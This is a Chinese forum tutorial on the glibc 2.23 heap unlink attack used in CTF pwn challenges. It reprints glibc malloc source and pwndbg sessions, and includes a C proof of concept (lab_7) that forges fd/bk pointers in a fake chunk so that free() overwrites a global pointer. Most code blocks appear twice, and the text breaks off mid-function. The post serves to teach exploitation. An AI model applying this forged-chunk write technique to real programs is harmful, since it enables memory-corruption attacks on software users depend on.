首页
社区
课程
招聘
[原创]PWN堆unlink
发表于: 2024-10-15 18:19 5652

[原创]PWN堆unlink

2024-10-15 18:19
5652

image-20241011173552451

prev_size:记录前一个堆块的大小

size:记录当前堆块的大小

NMP

fdbk:是俩个指针,主要用来free堆块后,free的堆块被bin管理时,形成的链表的指针。

fdbkuser_data、以及下一个prev_size:在堆块被申请之后都是用来存放用户输入的是数据

image-20241011190657295

image-20241011202013282

image-20241011205533616

image-20241011205836889

image-20241011211248415

这里面先使用gdb动态调试查看main_arena的结构
a
b

下面用图介绍一下main_arena并给出一些在本题中比较重要的一些东西:

image-20241012144414362

image-20241012004522203

image-20241012004711018

image-20241012004749460

image-20241012005134304

image-20241012005407377

image-20241012005510377

image-20241012005749362

image-20241012010916091

image-20241012083146668

image-20241012083613606

查看分析glibc源码,并使用图描述unlink的过程,然后具体了解unlink的检查过程

Index of /gnu/glibc在该网站上找到glibc2.23,下载解压后在该目录glibc-2.23\malloc下找到malloc.c,搜索到unlink,查找到unlink这个宏定义,这段代码就是unlink的具体过程

image-20241012012121452

image-20241014003310634

image-20241014003535459

也就是说在脱链之前,也就是说他会先检查下图红线加粗的链表是否指向要脱掉的链,就可以防止双向链表的破坏。防止FD中的bk指针被修改或者BK的fd指针被修改

image-20241014003748158

image-20241013215207007

image-20241013215528177

使用heap -v指令查看堆块,现在堆块还没有被修改
image-20241013215654890

然后再使用ni指令,将程序运行到free之前的一个语句

image-20241013215912948

image-20241013215945611

image-20241013220150378

image-20241013220334397

image-20241013220844649

接下来画图进行分析unlink的这个具体过程,首先先来说明一下unlink attack的具体条件

接下来画图解释(地址就以分析1中得到的地址为准),所做的伪造堆块的前提准备是这样的

image-20241014004015611

image-20241014004313356

image-20241014013509924

image-20241014013530883

image-20241014013758463

image-20241014162706992

image-20241014170145896

image-20241014170440795

image-20241014170650165

image-20241014170306826

image-20241014170745866

image-20241014170857823

image-20241014170947795

已知程序在开头就已经申请了0x10个字节了,但是这个堆块并没有什么用

我们需要申请3个堆块,第1个、第2个堆块尽量都申请free后能放入unsortedbin的这个链表

然后第3个随便申请一个堆块就可以了(这里申请第3个堆块的原因是,防止free第二个堆块时,第二个堆块与第一个堆块合并之后再被合并入top_chunk中)

这时再使用change函数修改堆块造成堆溢出,刚好具有现成的指向第一个堆块的指针(即itemlist[0].name)

gdb动态调试查看,先申请一个堆块,使用x/20gx 0x6020C0查看这个结构体数组,发现该指针在0x6020c0+0x8的这个位置

image-20241014174234602

image-20241014180431338

image-20241014180752633

image-20241014182259777

image-20241014182408425

image-20241014182706093

0x10--->0001 0000
0x18--->0001 1000
0x20--->0010 0000
0x10--->0001 0000
0x18--->0001 1000
0x20--->0010 0000
struct malloc_state
{
  /* Serialize access.  */
  mutex_t mutex;
 
  /* Flags (formerly in max_fast).  */
  int flags;
 
  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];
 
  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;
 
  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;
 
  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];
 
  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];
 
  /* Linked list */
  struct malloc_state *next;
 
  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;
 
  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;
 
  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
struct malloc_state
{
  /* Serialize access.  */
  mutex_t mutex;
 
  /* Flags (formerly in max_fast).  */
  int flags;
 
  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];
 
  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;
 
  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;
 
  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];
 
  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];
 
  /* Linked list */
  struct malloc_state *next;
 
  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;
 
  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;
 
  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
static struct malloc_state main_arena =
{
  .mutex = _LIBC_LOCK_INITIALIZER,
  .next = &main_arena,
  .attached_threads = 1
};
static struct malloc_state main_arena =
{
  .mutex = _LIBC_LOCK_INITIALIZER,
  .next = &main_arena,
  .attached_threads = 1
};
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
 
long long int a[100];
 
int main() {
    long long int *p1 = malloc(0x100);
    long long int *pp = malloc(0x100);
    long long int *p2 = malloc(0x100);
    long long int *p3 = malloc(0x100);
    free(p1);
    free(p2);
    free(p3);
    return 0;
}
# gcc -o unlink_64 unlink_64.c -fno-stack-protector -z execstack
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
 
long long int a[100];
 
int main() {
    long long int *p1 = malloc(0x100);
    long long int *pp = malloc(0x100);
    long long int *p2 = malloc(0x100);
    long long int *p3 = malloc(0x100);
    free(p1);
    free(p2);
    free(p3);
    return 0;
}
# gcc -o unlink_64 unlink_64.c -fno-stack-protector -z execstack
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
#include<string.h>
#include<unistd.h>
long long int a[100];
int main(){
        long long int *p1 = malloc(0x100);
        long long int *pp = malloc(0x100);
        long long int *p2 = malloc(0x100);
        long long int *p3 = malloc(0x100);
        long long int *p4 = malloc(0x100);
        free(p1);
        free(p2);
        free(p3);
        free(p4);
        return 0;
}
// gcc -o lab_3 lab_3.c -fno-stack-protector -z execstack
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
#include<string.h>
#include<unistd.h>
long long int a[100];
int main(){
        long long int *p1 = malloc(0x100);
        long long int *pp = malloc(0x100);
        long long int *p2 = malloc(0x100);
        long long int *p3 = malloc(0x100);
        long long int *p4 = malloc(0x100);
        free(p1);
        free(p2);
        free(p3);
        free(p4);
        return 0;
}
// gcc -o lab_3 lab_3.c -fno-stack-protector -z execstack
#define unlink(AV, P, BK, FD) {                                           
    FD = P->fd;                                   
    BK = P->bk;                                   
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))          
      malloc_printerr (check_action, "corrupted double-linked list", P, AV); 
    else {                                   
        FD->bk = BK;                              
        BK->fd = FD;                              
        if (!in_smallbin_range(P->size)&& __builtin_expect (P->fd_nextsize != NULL, 0))
        {            
            if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)         
            || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))   
                 malloc_printerr (check_action,"corrupted double-linked list (not small)",P, AV);      
            if (FD->fd_nextsize == NULL)
            {                    
                   if (P->fd_nextsize == P)                   
                      FD->fd_nextsize = FD->bk_nextsize = FD;          
                else
                {                                
                    FD->fd_nextsize = P->fd_nextsize;              
                    FD->bk_nextsize = P->bk_nextsize;              
                    P->fd_nextsize->bk_nextsize = FD;              
                    P->bk_nextsize->fd_nextsize = FD;              
                 }                               
             }
            else
            {                                
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;           
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;           
            }                                    
          }                                  
      }                                      
}
#define unlink(AV, P, BK, FD) {                                           
    FD = P->fd;                                   
    BK = P->bk;                                   
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))          
      malloc_printerr (check_action, "corrupted double-linked list", P, AV); 
    else {                                   
        FD->bk = BK;                              
        BK->fd = FD;                              
        if (!in_smallbin_range(P->size)&& __builtin_expect (P->fd_nextsize != NULL, 0))
        {            
            if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)         
            || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))   
                 malloc_printerr (check_action,"corrupted double-linked list (not small)",P, AV);      
            if (FD->fd_nextsize == NULL)
            {                    
                   if (P->fd_nextsize == P)                   
                      FD->fd_nextsize = FD->bk_nextsize = FD;          
                else
                {                                
                    FD->fd_nextsize = P->fd_nextsize;              
                    FD->bk_nextsize = P->bk_nextsize;              
                    P->fd_nextsize->bk_nextsize = FD;              
                    P->bk_nextsize->fd_nextsize = FD;              
                 }                               
             }
            else
            {                                
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;           
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;           
            }                                    
          }                                  
      }                                      
}
FD = P->fd
BK = P->bk
FD = P->fd
BK = P->bk
FD->bk = BK;                              
BK->fd = FD;                              
FD->bk = BK;                              
BK->fd = FD;                              
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))          
   malloc_printerr (check_action, "corrupted double-linked list", P, AV); 
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))          
   malloc_printerr (check_action, "corrupted double-linked list", P, AV); 
/* consolidate backward */   /**/
if (!prev_inuse(p)) {
  prevsize = p->prev_size;
  size += prevsize;
  p = chunk_at_offset(p, -((long) prevsize));
  unlink(av, p, bck, fwd);
}
 
if (nextchunk != av->top) {
  /* get and clear inuse bit */
  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
  /* consolidate forward */   /*后向合并*/
  if (!nextinuse) {
unlink(av, nextchunk, bck, fwd);
size += nextsize;
  } else
clear_inuse_bit_at_offset(nextchunk, 0);
/* consolidate backward */   /**/
if (!prev_inuse(p)) {
  prevsize = p->prev_size;
  size += prevsize;
  p = chunk_at_offset(p, -((long) prevsize));
  unlink(av, p, bck, fwd);
}
 
if (nextchunk != av->top) {
  /* get and clear inuse bit */
  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
  /* consolidate forward */   /*后向合并*/
  if (!nextinuse) {
unlink(av, nextchunk, bck, fwd);
size += nextsize;
  } else
clear_inuse_bit_at_offset(nextchunk, 0);
static void malloc_consolidate(mstate av)
{
  mfastbinptr*    fb;                 /* current fastbin being consolidated */
  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
  mchunkptr       p;                  /* current chunk being consolidated */
  mchunkptr       nextp;              /* next chunk to consolidate */
  mchunkptr       unsorted_bin;       /* bin header */
  mchunkptr       first_unsorted;     /* chunk to link to */
 
  /* These have same use as in free() */
  mchunkptr       nextchunk;
  INTERNAL_SIZE_T size;
  INTERNAL_SIZE_T nextsize;
  INTERNAL_SIZE_T prevsize;
  int             nextinuse;
  mchunkptr       bck;
  mchunkptr       fwd;
 
  /*
    If max_fast is 0, we know that av hasn't
    yet been initialized, in which case do so below
  */
 
  if (get_max_fast () != 0) {
    clear_fastchunks(av);
 
    unsorted_bin = unsorted_chunks(av);
 
    /*
      Remove each chunk from fast bin and consolidate it, placing it
      then in unsorted bin. Among other reasons for doing this,
      placing in unsorted bin avoids needing to calculate actual bins
      until malloc is sure that chunks aren't immediately going to be
      reused anyway.
    */
 
    maxfb = &fastbin (av, NFASTBINS - 1);
    fb = &fastbin (av, 0);
    do {
      p = atomic_exchange_acq (fb, 0);
      if (p != 0) {
    do {
      check_inuse_chunk(av, p);
      nextp = p->fd;
 
      /* Slightly streamlined version of consolidation code in free() */
      size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
      nextchunk = chunk_at_offset(p, size);
      nextsize = chunksize(nextchunk);
 
      if (!prev_inuse(p)) {
        prevsize = p->prev_size;
        size += prevsize;
        p = chunk_at_offset(p, -((long) prevsize));
        unlink(av, p, bck, fwd);
      }
 
      if (nextchunk != av->top) {
        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
        if (!nextinuse) {
          size += nextsize;
          unlink(av, nextchunk, bck, fwd);
        } else
          clear_inuse_bit_at_offset(nextchunk, 0);
 
        first_unsorted = unsorted_bin->fd;
        unsorted_bin->fd = p;
        first_unsorted->bk = p;
 
        if (!in_smallbin_range (size)) {
          p->fd_nextsize = NULL;
          p->bk_nextsize = NULL;
        }
 
        set_head(p, size | PREV_INUSE);
        p->bk = unsorted_bin;
        p->fd = first_unsorted;
        set_foot(p, size);
      }
 
      else {
        size += nextsize;
        set_head(p, size | PREV_INUSE);
        av->top = p;
      }
 
    } while ( (p = nextp) != 0);
 
      }
    } while (fb++ != maxfb);
  }
  else {
    malloc_init_state(av);
    check_malloc_state(av);
  }
}
static void malloc_consolidate(mstate av)
{
  mfastbinptr*    fb;                 /* current fastbin being consolidated */
  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
  mchunkptr       p;                  /* current chunk being consolidated */
  mchunkptr       nextp;              /* next chunk to consolidate */
  mchunkptr       unsorted_bin;       /* bin header */
  mchunkptr       first_unsorted;     /* chunk to link to */
 
  /* These have same use as in free() */
  mchunkptr       nextchunk;
  INTERNAL_SIZE_T size;
  INTERNAL_SIZE_T nextsize;
  INTERNAL_SIZE_T prevsize;
  int             nextinuse;
  mchunkptr       bck;
  mchunkptr       fwd;
 
  /*
    If max_fast is 0, we know that av hasn't
    yet been initialized, in which case do so below
  */
 
  if (get_max_fast () != 0) {
    clear_fastchunks(av);
 
    unsorted_bin = unsorted_chunks(av);
 
    /*
      Remove each chunk from fast bin and consolidate it, placing it
      then in unsorted bin. Among other reasons for doing this,
      placing in unsorted bin avoids needing to calculate actual bins
      until malloc is sure that chunks aren't immediately going to be
      reused anyway.
    */
 
    maxfb = &fastbin (av, NFASTBINS - 1);
    fb = &fastbin (av, 0);
    do {
      p = atomic_exchange_acq (fb, 0);
      if (p != 0) {
    do {
      check_inuse_chunk(av, p);
      nextp = p->fd;
 
      /* Slightly streamlined version of consolidation code in free() */
      size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
      nextchunk = chunk_at_offset(p, size);
      nextsize = chunksize(nextchunk);
 
      if (!prev_inuse(p)) {
        prevsize = p->prev_size;
        size += prevsize;
        p = chunk_at_offset(p, -((long) prevsize));
        unlink(av, p, bck, fwd);
      }
 
      if (nextchunk != av->top) {
        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
        if (!nextinuse) {
          size += nextsize;
          unlink(av, nextchunk, bck, fwd);
        } else
          clear_inuse_bit_at_offset(nextchunk, 0);
 
        first_unsorted = unsorted_bin->fd;
        unsorted_bin->fd = p;
        first_unsorted->bk = p;
 
        if (!in_smallbin_range (size)) {
          p->fd_nextsize = NULL;
          p->bk_nextsize = NULL;
        }
 
        set_head(p, size | PREV_INUSE);
        p->bk = unsorted_bin;
        p->fd = first_unsorted;
        set_foot(p, size);
      }
 
      else {
        size += nextsize;
        set_head(p, size | PREV_INUSE);
        av->top = p;
      }
 
    } while ( (p = nextp) != 0);
 
      }
    } while (fb++ != maxfb);
  }
  else {
    malloc_init_state(av);
    check_malloc_state(av);
  }
}
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
 
long long unsigned int* a[100];
 
int main()
{
    long long unsigned int *p1, *p2, *p3, target;
 
    target = (long long unsigned int)&a[5];  // 目标地址(用于任意地址写入)
    printf("target:%p\n%p\n%p\n",target,target - 0x18,target - 0x10);
    a[0] = (void*)0x0;
    a[1] = (void*)0x110;
    // 分配堆块
    malloc(0x20);
    p1 = malloc(0x100);
    p2 = malloc(0x100);
    p3 = malloc(0x100);
    a[5] = p1;
    printf("beforefree:a[5]: %p\n",a[5]);
    printf("p1: %p\n", p1);
    // 伪造 p1 的堆块元数据
    p1[0] = 0x0;   // prev_size
    p1[1] = 0x101; // size
 
    // 伪造 fd 和 bk,使其形成合法的链表
    p1[2] = (long long unsigned int)(target - 0x18);  // fd,指向目标地址
    p1[3] = (long long unsigned int)(target - 0x10);  // bk,指向目标地址
    // read(0,p1+0x20,0x90);
    // 调整 p2 的堆块元数据,符合堆管理器的期望格式
    p2[-2] = 0x100;  // prev_size
    p2[-1] = 0x110;  // size
 
    // 释放 p2,触发 unlink 漏洞
    free(p2);
    // 验证目标地址是否被覆盖
    printf("afterfree:a[5]: %p\n",a[5]);
    return 0;
}
//  gcc -o lab_7 lab_7.c -fno-stack-protector -z execstack -z norelro -fno-builtin
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
 
long long unsigned int* a[100];
 
int main()
{
    long long unsigned int *p1, *p2, *p3, target;
 
    target = (long long unsigned int)&a[5];  // 目标地址(用于任意地址写入)
    printf("target:%p\n%p\n%p\n",target,target - 0x18,target - 0x10);
    a[0] = (void*)0x0;
    a[1] = (void*)0x110;
    // 分配堆块
    malloc(0x20);
    p1 = malloc(0x100);
    p2 = malloc(0x100);
    p3 = malloc(0x100);
    a[5] = p1;
    printf("beforefree:a[5]: %p\n",a[5]);
    printf("p1: %p\n", p1);
    // 伪造 p1 的堆块元数据
    p1[0] = 0x0;   // prev_size
    p1[1] = 0x101; // size
 
    // 伪造 fd 和 bk,使其形成合法的链表
    p1[2] = (long long unsigned int)(target - 0x18);  // fd,指向目标地址
    p1[3] = (long long unsigned int)(target - 0x10);  // bk,指向目标地址
    // read(0,p1+0x20,0x90);
    // 调整 p2 的堆块元数据,符合堆管理器的期望格式
    p2[-2] = 0x100;  // prev_size
    p2[-1] = 0x110;  // size
 
    // 释放 p2,触发 unlink 漏洞
    free(p2);
    // 验证目标地址是否被覆盖
    printf("afterfree:a[5]: %p\n",a[5]);
    return 0;
}
//  gcc -o lab_7 lab_7.c -fno-stack-protector -z execstack -z norelro -fno-builtin
0x7f3ac4ad8fe0 <_int_free+640>   ✔ jne    _int_free+2048                <_int_free+2048>
0x7f3ac4ad8fe0 <_int_free+640>   ✔ jne    _int_free+2048                <_int_free+2048>
pwndbg> x/20gx 0x600b10-0x20
0x600af0:       0x0000000000000000      0x0000000000000000
0x600b00 <a>:   0x0000000000000000      0x0000000000000000
0x600b10 <a+16>:        0x0000000000000000      0x0000000000000000
0x600b20 <a+32>:        0x0000000000000000      0x0000000000600b10
0x600b30 <a+48>:        0x0000000000000000      0x0000000000000000
0x600b40 <a+64>:        0x0000000000000000      0x0000000000000000
0x600b50 <a+80>:        0x0000000000000000      0x0000000000000000
0x600b60 <a+96>:        0x0000000000000000      0x0000000000000000
0x600b70 <a+112>:       0x0000000000000000      0x0000000000000000
0x600b80 <a+128>:       0x0000000000000000      0x0000000000000000
pwndbg> unsorted
unsortedbin
empty
pwndbg> x/20gx 0x600b10-0x20
0x600af0:       0x0000000000000000      0x0000000000000000
0x600b00 <a>:   0x0000000000000000      0x0000000000000000
0x600b10 <a+16>:        0x0000000000000000      0x0000000000000000
0x600b20 <a+32>:        0x0000000000000000      0x0000000000600b10
0x600b30 <a+48>:        0x0000000000000000      0x0000000000000000
0x600b40 <a+64>:        0x0000000000000000      0x0000000000000000
0x600b50 <a+80>:        0x0000000000000000      0x0000000000000000
0x600b60 <a+96>:        0x0000000000000000      0x0000000000000000
0x600b70 <a+112>:       0x0000000000000000      0x0000000000000000
0x600b80 <a+128>:       0x0000000000000000      0x0000000000000000
pwndbg> unsorted
unsortedbin
empty
   0x7f18ae011f71 <_int_free+529>     cmp    rbx, qword ptr [rdx + 0x10]
   0x7f18ae011f75 <_int_free+533>     jne    _int_free+3034                <_int_free+3034>
 
   0x7f18ae011f7b <_int_free+539>     cmp    qword ptr [rbx + 8], 0x3ff
   0x7f18ae011f83 <_int_free+547>     mov    qword ptr [rax + 0x18], rdx
 0x7f18ae011f87 <_int_free+551>     mov    qword ptr [rdx + 0x10], rax
   0x7f18ae011f8b <_int_free+555>     jbe    _int_free+624                <_int_free+624>
 
pwndbg> bins
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty
   0x7f18ae011f71 <_int_free+529>     cmp    rbx, qword ptr [rdx + 0x10]
   0x7f18ae011f75 <_int_free+533>     jne    _int_free+3034                <_int_free+3034>
 
   0x7f18ae011f7b <_int_free+539>     cmp    qword ptr [rbx + 8], 0x3ff
   0x7f18ae011f83 <_int_free+547>     mov    qword ptr [rax + 0x18], rdx
 0x7f18ae011f87 <_int_free+551>     mov    qword ptr [rdx + 0x10], rax
   0x7f18ae011f8b <_int_free+555>     jbe    _int_free+624                <_int_free+624>
 
pwndbg> bins
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty
FD = P->fd
BK = P->bk
// 此时P为p2指向的堆块
// 由于是consolidate backward,所以在调用unlink前,P会被跟新为fake_chunk
// 故在unlink的时候P是指向fake_chunk的
FD = P->fd
BK = P->bk
// 此时P为p2指向的堆块
// 由于是consolidate backward,所以在调用unlink前,P会被跟新为fake_chunk
// 故在unlink的时候P是指向fake_chunk的
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))          
      malloc_printerr (check_action, "corrupted double-linked list", P, AV); 
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))          
      malloc_printerr (check_action, "corrupted double-linked list", P, AV); 
FD->bk = BK;                              
BK->fd = FD;
FD->bk = BK;                              
BK->fd = FD;
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */
 
  const char *errstr = NULL;
  int locked = 0;
 
  size = chunksize (p);
 
  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    {
      errstr = "free(): invalid pointer";
    errout:
      if (!have_lock && locked)
        (void) mutex_unlock (&av->mutex);
      malloc_printerr (check_action, errstr, chunk2mem (p), av);
      return;
    }
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    {
      errstr = "free(): invalid size";
      goto errout;
    }
 
  check_inuse_chunk(av, p);
 
  /*
    If eligible, place chunk on a fastbin so it can be found
    and used quickly in malloc.
  */
 
  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
 
#if TRIM_FASTBINS
      /*
    If TRIM_FASTBINS set, don't place chunks
    bordering top into fastbins
      */
      && (chunk_at_offset(p, size) != av->top)
#endif
      ) {
 
    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (chunksize (chunk_at_offset (p, size))
                 >= av->system_mem, 0))
      {
    /* We might not have a lock at this point and concurrent modifications
       of system_mem might have let to a false positive.  Redo the test
       after getting the lock.  */
    if (have_lock
        || ({ assert (locked == 0);
          mutex_lock(&av->mutex);
          locked = 1;
          chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
            || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
          }))
      {
        errstr = "free(): invalid next size (fast)";
        goto errout;
      }
    if (! have_lock)
      {
        (void)mutex_unlock(&av->mutex);
        locked = 0;
      }
      }
 
    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
 
    set_fastchunks(av);
    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);
 
    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    unsigned int old_idx = ~0u;
    do
      {
    /* Check that the top of the bin is not the record we are going to add
       (i.e., double free).  */
    if (__builtin_expect (old == p, 0))
      {
        errstr = "double free or corruption (fasttop)";
        goto errout;
      }
    /* Check that size of fastbin chunk at the top is the same as
       size of the chunk that we are adding.  We can dereference OLD
       only if we have the lock, otherwise it might have already been
       deallocated.  See use of OLD_IDX below for the actual check.  */
    if (have_lock && old != NULL)
      old_idx = fastbin_index(chunksize(old));
    p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
 
    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
      {
    errstr = "invalid fastbin entry (free)";
    goto errout;
      }
  }
 
  /*
    Consolidate other non-mmapped chunks as they arrive.
  */
 
  else if (!chunk_is_mmapped(p)) {
    if (! have_lock) {
      (void)mutex_lock(&av->mutex);
      locked = 1;
    }
 
    nextchunk = chunk_at_offset(p, size);
 
    /* Lightweight tests: check whether the block is already the
       top block.  */
    if (__glibc_unlikely (p == av->top))
      {
    errstr = "double free or corruption (top)";
    goto errout;
      }
    /* Or whether the next chunk is beyond the boundaries of the arena.  */
    if (__builtin_expect (contiguous (av)
              && (char *) nextchunk
              >= ((char *) av->top + chunksize(av->top)), 0))
      {
    errstr = "double free or corruption (out)";
    goto errout;
      }
    /* Or whether the block is actually not marked used.  */
    if (__glibc_unlikely (!prev_inuse(nextchunk)))
      {
    errstr = "double free or corruption (!prev)";
    goto errout;
      }
 
    nextsize = chunksize(nextchunk);
    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (nextsize >= av->system_mem, 0))
      {
    errstr = "free(): invalid next size (normal)";
    goto errout;
      }
 
    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
 
    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = p->prev_size;
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }
 
    if (nextchunk != av->top) {
      /* get and clear inuse bit */
      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
      /* consolidate forward */
      if (!nextinuse) {
    unlink(av, nextchunk, bck, fwd);
    size += nextsize;
      } else
    clear_inuse_bit_at_offset(nextchunk, 0);
 
      /*
    Place the chunk in unsorted chunk list. Chunks are
    not placed into regular bins until after they have
    been given one chance to be used in malloc.
      */
 
      bck = unsorted_chunks(av);
      fwd = bck->fd;
      if (__glibc_unlikely (fwd->bk != bck))
    {
      errstr = "free(): corrupted unsorted chunks";
      goto errout;
    }
      p->fd = fwd;
      p->bk = bck;
      if (!in_smallbin_range(size))
    {
      p->fd_nextsize = NULL;
      p->bk_nextsize = NULL;
    }
      bck->fd = p;
      fwd->bk = p;
 
      set_head(p, size | PREV_INUSE);
      set_foot(p, size);
 
      check_free_chunk(av, p);
    }
 
    /*
      If the chunk borders the current high end of memory,
      consolidate into top
    */
 
    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }
 
    /*
      If freeing a large space, consolidate possibly-surrounding
      chunks. Then, if the total unused topmost memory exceeds trim
      threshold, ask malloc_trim to reduce top.
 
      Unless max_fast is 0, we don't know if there are fastbins
      bordering top, so we cannot tell for sure whether threshold
      has been reached unless fastbins are consolidated.  But we
      don't want to consolidate on each free.  As a compromise,
      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
      is reached.
    */
 
    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
      if (have_fastchunks(av))
    malloc_consolidate(av);
 
      if (av == &main_arena) {
#ifndef MORECORE_CANNOT_TRIM
    if ((unsigned long)(chunksize(av->top)) >=
        (unsigned long)(mp_.trim_threshold))
      systrim(mp_.top_pad, av);
#endif
      } else {
    /* Always try heap_trim(), even if the top chunk is not
       large, because the corresponding heap might go away.  */
    heap_info *heap = heap_for_ptr(top(av));
 
    assert(heap->ar_ptr == av);
    heap_trim(heap, mp_.top_pad);
      }
    }
 
    if (! have_lock) {
      assert (locked);
      (void)mutex_unlock(&av->mutex);
    }
  }
  /*
    If the chunk was allocated via mmap, release via munmap().
  */
 
  else {
    munmap_chunk (p);
  }
}
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */
 
  const char *errstr = NULL;
  int locked = 0;
 
  size = chunksize (p);
 
  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    {
      errstr = "free(): invalid pointer";
    errout:
      if (!have_lock && locked)
        (void) mutex_unlock (&av->mutex);
      malloc_printerr (check_action, errstr, chunk2mem (p), av);
      return;
    }
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    {
      errstr = "free(): invalid size";
      goto errout;
    }
 
  check_inuse_chunk(av, p);
 
  /*
    If eligible, place chunk on a fastbin so it can be found
    and used quickly in malloc.
  */
 
  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
 
#if TRIM_FASTBINS
      /*
    If TRIM_FASTBINS set, don't place chunks
    bordering top into fastbins
      */
      && (chunk_at_offset(p, size) != av->top)
#endif
      ) {
 
    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (chunksize (chunk_at_offset (p, size))
                 >= av->system_mem, 0))
      {
    /* We might not have a lock at this point and concurrent modifications
       of system_mem might have let to a false positive.  Redo the test
       after getting the lock.  */
    if (have_lock
